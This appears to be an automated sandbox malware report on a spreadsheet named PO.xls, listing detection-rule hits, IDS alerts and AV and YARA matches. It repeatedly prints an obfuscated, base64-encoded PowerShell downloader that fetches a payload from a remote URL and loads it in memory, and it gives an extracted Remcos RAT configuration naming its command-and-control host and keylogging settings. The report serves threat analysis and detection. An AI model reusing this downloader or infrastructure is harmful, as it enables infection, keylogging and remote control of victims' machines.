C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmp
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElLId[1]+$SHELlid[13]+'x') (('g6Wurl = f'+'q4'+'ht'+'t'+'p'+'s://'+'ra'+'w.g'+'ithubuserconten'+'t.co'+'m/'+'NoDetectOn'+'/NoDe'+'t'+'e'+'ct'+'O'+'n/re'+'fs/h'+'e'+'ads/m'+'ain'+'/Detah'+'Noth-V'+'.'+'txtfq4; g6Wb'+'a'+'se6'+'4Conte'+'nt '+'= '+'(New-O'+'bject '+'Sy'+'stem.Net.'+'WebClie'+'n'+'t).'+'Dow'+'n'+'lo'+'adStr'+'ing(g6Wur'+'l); g'+'6'+'Wb'+'i'+'nary'+'Cont'+'ent = [Sy'+'stem.'+'Conver'+'t]:'+':Fro'+'mB'+'ase'+'64Str'+'ing'+'(g'+'6'+'Wba'+'se64'+'Conten'+'t);'+' g6Wassembl'+'y = [Ref'+'le'+'ction.Ass'+'e'+'mbly]::Load'+'(g6W'+'binaryCo'+'ntent'+'); '+'[dn'+'lib.IO.'+'Home'+']'+'::VAI(r'+'aytx'+'t.'+'REEWR/'+'055'+'/84'+'1.23.'+'8'+'61.'+'40'+'1'+'//:ptthray, '+'ray'+'desativ'+'a'+'d'+'or'+'ay'+', '+'raydes'+'at'+'ivador'+'ay, rayde'+'s'+'a'+'tivad'+'oray, '+'r'+'ayR'+'egAsmray'+', ra'+'yra'+'y,rayray)').rEPLACe(([cHAr]114+[cHAr]97+[cHAr]121),[sTriNG][cHAr]34).rEPLACe(([cHAr]102+[cHAr]113+[cHAr]52),[sTriNG][cHAr]39).rEPLACe(([cHAr]103+[cHAr]54+[cHAr]87),[sTriNG][cHAr]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElLId[1]+$SHELlid[13]+'x') (('g6Wurl = f'+'q4'+'ht'+'t'+'p'+'s://'+'ra'+'w.g'+'ithubuserconten'+'t.co'+'m/'+'NoDetectOn'+'/NoDe'+'t'+'e'+'ct'+'O'+'n/re'+'fs/h'+'e'+'ads/m'+'ain'+'/Detah'+'Noth-V'+'.'+'txtfq4; g6Wb'+'a'+'se6'+'4Conte'+'nt '+'= '+'(New-O'+'bject '+'Sy'+'stem.Net.'+'WebClie'+'n'+'t).'+'Dow'+'n'+'lo'+'adStr'+'ing(g6Wur'+'l); g'+'6'+'Wb'+'i'+'nary'+'Cont'+'ent = [Sy'+'stem.'+'Conver'+'t]:'+':Fro'+'mB'+'ase'+'64Str'+'ing'+'(g'+'6'+'Wba'+'se64'+'Conten'+'t);'+' g6Wassembl'+'y = [Ref'+'le'+'ction.Ass'+'e'+'mbly]::Load'+'(g6W'+'binaryCo'+'ntent'+'); '+'[dn'+'lib.IO.'+'Home'+']'+'::VAI(r'+'aytx'+'t.'+'REEWR/'+'055'+'/84'+'1.23.'+'8'+'61.'+'40'+'1'+'//:ptthray, '+'ray'+'desativ'+'a'+'d'+'or'+'ay'+', '+'raydes'+'at'+'ivador'+'ay, rayde'+'s'+'a'+'tivad'+'oray, '+'r'+'ayR'+'egAsmray'+', ra'+'yra'+'y,rayray)').rEPLACe(([cHAr]114+[cHAr]97+[cHAr]121),[sTriNG][cHAr]34).rEPLACe(([cHAr]102+[cHAr]113+[cHAr]52),[sTriNG][cHAr]39).rEPLACe(([cHAr]103+[cHAr]54+[cHAr]87),[sTriNG][cHAr]36) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmp
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmplY3QgJysnU3knKydzdGVtLk5ldC4nKydXZWJDbGllJysnbicrJ3QpLicrJ0RvdycrJ24nKydsbycrJ2FkU3RyJysnaW5nKGc2V3VyJysnbCk7IGcnKyc2JysnV2InKydpJysnbmFyeScrJ0NvbnQnKydlbnQgPSBbU3knKydzdGVtLicrJ0NvbnZlcicrJ3RdOicrJzpGcm8nKydtQicrJ2FzZScrJzY0U3RyJysnaW5nJysnKGcnKyc2JysnV2JhJysnc2U2NCcrJ0NvbnRlbicrJ3QpOycrJyBnNldhc3NlbWJsJysneSA9IFtSZWYnKydsZScrJ2N0aW9uLkFzcycrJ2UnKydtYmx5XTo6TG9hZCcrJyhnNlcnKydiaW5hcnlDbycrJ250ZW50JysnKTsgJysnW2RuJysnbGliLklPLicrJ0hvbWUnKyddJysnOjpWQUkocicrJ2F5dHgnKyd0LicrJ1JFRVdSLycrJzA1NScrJy84NCcrJzEuMjMuJysnOCcrJzYxLicrJzQwJysnMScrJy8vOnB0dGhyYXksICcrJ3JheScrJ2Rlc2F0aXYnKydhJysnZCcrJ29yJysnYXknKycsICcrJ3JheWRlcycrJ2F0JysnaXZhZG9yJysnYXksIHJheWRlJysncycrJ2EnKyd0aXZhZCcrJ29yYXksICcrJ3InKydheVInKydlZ0FzbXJheScrJywgcmEnKyd5cmEnKyd5LHJheXJheSknKS5yRVBMQUNlKChbY0hBcl0xMTQrW2NIQXJdOTcrW2NIQXJdMTIxKSxbc1RyaU5HXVtjSEFyXTM0KS5yRVBMQUNlKChbY0hBcl0xMDIrW2NIQXJdMTEzK1tjSEFyXTUyKSxbc1RyaU5HXVtjSEFyXTM5KS5yRVBMQUNlKChbY0hBcl0xMDMrW2NIQXJdNTQrW2NIQXJdODcpLFtzVHJpTkddW2NIQXJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmplY3QgJysnU3knKydzdGVtLk5ldC4nKydXZWJDbGllJysnbicrJ3QpLicrJ0RvdycrJ24nKydsbycrJ2FkU3RyJysnaW5nKGc2V3VyJysnbCk7IGcnKyc2JysnV2InKydpJysnbmFyeScrJ0NvbnQnKydlbnQgPSBbU3knKydzdGVtLicrJ0NvbnZlcicrJ3RdOicrJzpGcm8nKydtQicrJ2FzZScrJzY0U3RyJysnaW5nJysnKGcnKyc2JysnV2JhJysnc2U2NCcrJ0NvbnRlbicrJ3QpOycrJyBnNldhc3NlbWJsJysneSA9IFtSZWYnKydsZScrJ2N0aW9uLkFzcycrJ2UnKydtYmx5XTo6TG9hZCcrJyhnNlcnKydiaW5hcnlDbycrJ250ZW50JysnKTsgJysnW2RuJysnbGliLklPLicrJ0hvbWUnKyddJysnOjpWQUkocicrJ2F5dHgnKyd0LicrJ1JFRVdSLycrJzA1NScrJy84NCcrJzEuMjMuJysnOCcrJzYxLicrJzQwJysnMScrJy8vOnB0dGhyYXksICcrJ3JheScrJ2Rlc2F0aXYnKydhJysnZCcrJ29yJysnYXknKycsICcrJ3JheWRlcycrJ2F0JysnaXZhZG9yJysnYXksIHJheWRlJysncycrJ2EnKyd0aXZhZCcrJ29yYXksICcrJ3InKydheVInKydlZ0FzbXJheScrJywgcmEnKyd5cmEnKyd5LHJheXJheSknKS5yRVBMQUNlKChbY0hBcl0xMTQrW2NIQXJdOTcrW2NIQXJdMTIxKSxbc1RyaU5HXVtjSEFyXTM0KS5yRVBMQUNlKChbY0hBcl0xMDIrW2NIQXJdMTEzK1tjSEFyXTUyKSxbc1RyaU5HXVtjSEFyXTM5KS5yRVBMQUNlKChbY0hBcl0xMDMrW2NIQXJd
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepicturewithyourebodygreen.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepicturewithyourebodygreen.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3208, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepicturewithyourebodygreen.vBS" , ProcessId: 3896, ProcessName: wscript.exe
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepicturewithyourebodygreen.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepicturewithyourebodygreen.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3208, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepicturewithyourebodygreen.vBS" , ProcessId: 3896, ProcessName: wscript.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmplY3QgJysnU3knKydzdGVtLk5ldC4nKydXZWJDbGllJysnbicrJ3QpLicrJ0RvdycrJ24nKydsbycrJ2FkU3RyJysnaW5nKGc2V3VyJysnbCk7IGcnKyc2JysnV2InKydpJysnbmFyeScrJ0NvbnQnKydlbnQgPSBbU3knKydzdGVtLicrJ0NvbnZlcicrJ3RdOicrJzpGcm8nKydtQicrJ2FzZScrJzY0U3RyJysnaW5nJysnKGcnKyc2JysnV2JhJysnc2U2NCcrJ0NvbnRlbicrJ3QpOycrJyBnNldhc3NlbWJsJysneSA9IFtSZWYnKydsZScrJ2N0aW9uLkFzcycrJ2UnKydtYmx5XTo6TG9hZCcrJyhnNlcnKydiaW5hcnlDbycrJ250ZW50JysnKTsgJysnW2RuJysnbGliLklPLicrJ0hvbWUnKyddJysnOjpWQUkocicrJ2F5dHgnKyd0LicrJ1JFRVdSLycrJzA1NScrJy84NCcrJzEuMjMuJysnOCcrJzYxLicrJzQwJysnMScrJy8vOnB0dGhyYXksICcrJ3JheScrJ2Rlc2F0aXYnKydhJysnZCcrJ29yJysnYXknKycsICcrJ3JheWRlcycrJ2F0JysnaXZhZG9yJysnYXksIHJheWRlJysncycrJ2EnKyd0aXZhZCcrJ29yYXksICcrJ3InKydheVInKydlZ0FzbXJheScrJywgcmEnKyd5cmEnKyd5LHJheXJheSknKS5yRVBMQUNlKChbY0hBcl0xMTQrW2NIQXJdOTcrW2NIQXJdMTIxKSxbc1RyaU5HXVtjSEFyXTM0KS5yRVBMQUNlKChbY0hBcl0xMDIrW2NIQXJdMTEzK1tjSEFyXTUyKSxbc1RyaU5HXVtjSEFyXTM5KS5yRVBMQUNlKChbY0hBcl0xMDMrW2NIQXJdNTQrW2NIQXJdODcpLFtzVHJpTkddW2NIQXJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmplY3QgJysnU3knKydzdGVtLk5ldC4nKydXZWJDbGllJysnbicrJ3QpLicrJ0RvdycrJ24nKydsbycrJ2FkU3RyJysnaW5nKGc2V3VyJysnbCk7IGcnKyc2JysnV2InKydpJysnbmFyeScrJ0NvbnQnKydlbnQgPSBbU3knKydzdGVtLicrJ0NvbnZlcicrJ3RdOicrJzpGcm8nKydtQicrJ2FzZScrJzY0U3RyJysnaW5nJysnKGcnKyc2JysnV2JhJysnc2U2NCcrJ0NvbnRlbicrJ3QpOycrJyBnNldhc3NlbWJsJysneSA9IFtSZWYnKydsZScrJ2N0aW9uLkFzcycrJ2UnKydtYmx5XTo6TG9hZCcrJyhnNlcnKydiaW5hcnlDbycrJ250ZW50JysnKTsgJysnW2RuJysnbGliLklPLicrJ0hvbWUnKyddJysnOjpWQUkocicrJ2F5dHgnKyd0LicrJ1JFRVdSLycrJzA1NScrJy84NCcrJzEuMjMuJysnOCcrJzYxLicrJzQwJysnMScrJy8vOnB0dGhyYXksICcrJ3JheScrJ2Rlc2F0aXYnKydhJysnZCcrJ29yJysnYXknKycsICcrJ3JheWRlcycrJ2F0JysnaXZhZG9yJysnYXksIHJheWRlJysncycrJ2EnKyd0aXZhZCcrJ29yYXksICcrJ3InKydheVInKydlZ0FzbXJheScrJywgcmEnKyd5cmEnKyd5LHJheXJheSknKS5yRVBMQUNlKChbY0hBcl0xMTQrW2NIQXJdOTcrW2NIQXJdMTIxKSxbc1RyaU5HXVtjSEFyXTM0KS5yRVBMQUNlKChbY0hBcl0xMDIrW2NIQXJdMTEzK1tjSEFyXTUyKSxbc1RyaU5HXVtjSEFyXTM5KS5yRVBMQUNlKChbY0hBcl0xMDMrW2NIQXJd
                    Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 172.67.179.215, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3208, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                    Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3208, Protocol: tcp, SourceIp: 172.67.179.215, SourceIsIpv6: false, SourcePort: 443
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepicturewithyourebodygreen.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepicturewithyourebodygreen.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3208, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepicturewithyourebodygreen.vBS" , ProcessId: 3896, ProcessName: wscript.exe
                    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3208, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmplY3QgJysnU3knKydzdGVtLk5ldC4nKydXZWJDbGllJysnbicrJ3QpLicrJ0RvdycrJ24nKydsbycrJ2FkU3RyJysnaW5nKGc2V3VyJysnbCk7IGcnKyc2JysnV2InKydpJysnbmFyeScrJ0NvbnQnKydlbnQgPSBbU3knKydzdGVtLicrJ0NvbnZlcicrJ3RdOicrJzpGcm8nKydtQicrJ2FzZScrJzY0U3RyJysnaW5nJysnKGcnKyc2JysnV2JhJysnc2U2NCcrJ0NvbnRlbicrJ3QpOycrJyBnNldhc3NlbWJsJysneSA9IFtSZWYnKydsZScrJ2N0aW9uLkFzcycrJ2UnKydtYmx5XTo6TG9hZCcrJyhnNlcnKydiaW5hcnlDbycrJ250ZW50JysnKTsgJysnW2RuJysnbGliLklPLicrJ0hvbWUnKyddJysnOjpWQUkocicrJ2F5dHgnKyd0LicrJ1JFRVdSLycrJzA1NScrJy84NCcrJzEuMjMuJysnOCcrJzYxLicrJzQwJysnMScrJy8vOnB0dGhyYXksICcrJ3JheScrJ2Rlc2F0aXYnKydhJysnZCcrJ29yJysnYXknKycsICcrJ3JheWRlcycrJ2F0JysnaXZhZG9yJysnYXksIHJheWRlJysncycrJ2EnKyd0aXZhZCcrJ29yYXksICcrJ3InKydheVInKydlZ0FzbXJheScrJywgcmEnKyd5cmEnKyd5LHJheXJheSknKS5yRVBMQUNlKChbY0hBcl0xMTQrW2NIQXJdOTcrW2NIQXJdMTIxKSxbc1RyaU5HXVtjSEFyXTM0KS5yRVBMQUNlKChbY0hBcl0xMDIrW2NIQXJdMTEzK1tjSEFyXTUyKSxbc1RyaU5HXVtjSEFyXTM5KS5yRVBMQUNlKChbY0hBcl0xMDMrW2NIQXJdNTQrW2NIQXJdODcpLFtzVHJpTkddW2NIQXJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmplY3QgJysnU3knKydzdGVtLk5ldC4nKydXZWJDbGllJysnbicrJ3QpLicrJ0RvdycrJ24nKydsbycrJ2FkU3RyJysnaW5nKGc2V3VyJysnbCk7IGcnKyc2JysnV2InKydpJysnbmFyeScrJ0NvbnQnKydlbnQgPSBbU3knKydzdGVtLicrJ0NvbnZlcicrJ3RdOicrJzpGcm8nKydtQicrJ2FzZScrJzY0U3RyJysnaW5nJysnKGcnKyc2JysnV2JhJysnc2U2NCcrJ0NvbnRlbicrJ3QpOycrJyBnNldhc3NlbWJsJysneSA9IFtSZWYnKydsZScrJ2N0aW9uLkFzcycrJ2UnKydtYmx5XTo6TG9hZCcrJyhnNlcnKydiaW5hcnlDbycrJ250ZW50JysnKTsgJysnW2RuJysnbGliLklPLicrJ0hvbWUnKyddJysnOjpWQUkocicrJ2F5dHgnKyd0LicrJ1JFRVdSLycrJzA1NScrJy84NCcrJzEuMjMuJysnOCcrJzYxLicrJzQwJysnMScrJy8vOnB0dGhyYXksICcrJ3JheScrJ2Rlc2F0aXYnKydhJysnZCcrJ29yJysnYXknKycsICcrJ3JheWRlcycrJ2F0JysnaXZhZG9yJysnYXksIHJheWRlJysncycrJ2EnKyd0aXZhZCcrJ29yYXksICcrJ3InKydheVInKydlZ0FzbXJheScrJywgcmEnKyd5cmEnKyd5LHJheXJheSknKS5yRVBMQUNlKChbY0hBcl0xMTQrW2NIQXJdOTcrW2NIQXJdMTIxKSxbc1RyaU5HXVtjSEFyXTM0KS5yRVBMQUNlKChbY0hBcl0xMDIrW2NIQXJdMTEzK1tjSEFyXTUyKSxbc1RyaU5HXVtjSEFyXTM5KS5yRVBMQUNlKChbY0hBcl0xMDMrW2NIQXJd
                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3528, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3940, TargetFilename: C:\Users\user\AppData\Local\Temp\zl4k3cti.br0.ps1

                    Stealing of Sensitive Information

                    barindex
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3044, TargetFilename: C:\ProgramData\remcos\logs.dat
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-27T12:51:55.558444+020020204231Exploit Kit Activity Detected104.168.32.14880192.168.2.2249174TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-27T12:51:55.558444+020020204251Exploit Kit Activity Detected104.168.32.14880192.168.2.2249174TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-27T12:52:30.703257+020020365941Malware Command and Control Activity Detected192.168.2.224917545.134.140.6850312TCP
                    2024-09-27T12:52:59.119714+020020365941Malware Command and Control Activity Detected192.168.2.224917645.134.140.6850312TCP
                    2024-09-27T12:54:23.160130+020020365941Malware Command and Control Activity Detected192.168.2.224917745.134.140.6850312TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{91BCF8F6-C2FD-4749-855D-C3013FC0B30C}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                    Source: 00000010.00000002.1027592173.0000000000891000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "ramcxx.duckdns.org:50312:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-M3P7YT", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                    Source: PO.xlsReversingLabs: Detection: 18%
                    Source: Yara matchFile source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.6a480d8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.6a480d8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.1027741834.000000000239E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1027592173.0000000000891000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.474061036.0000000003389000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.476480463.00000000065E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
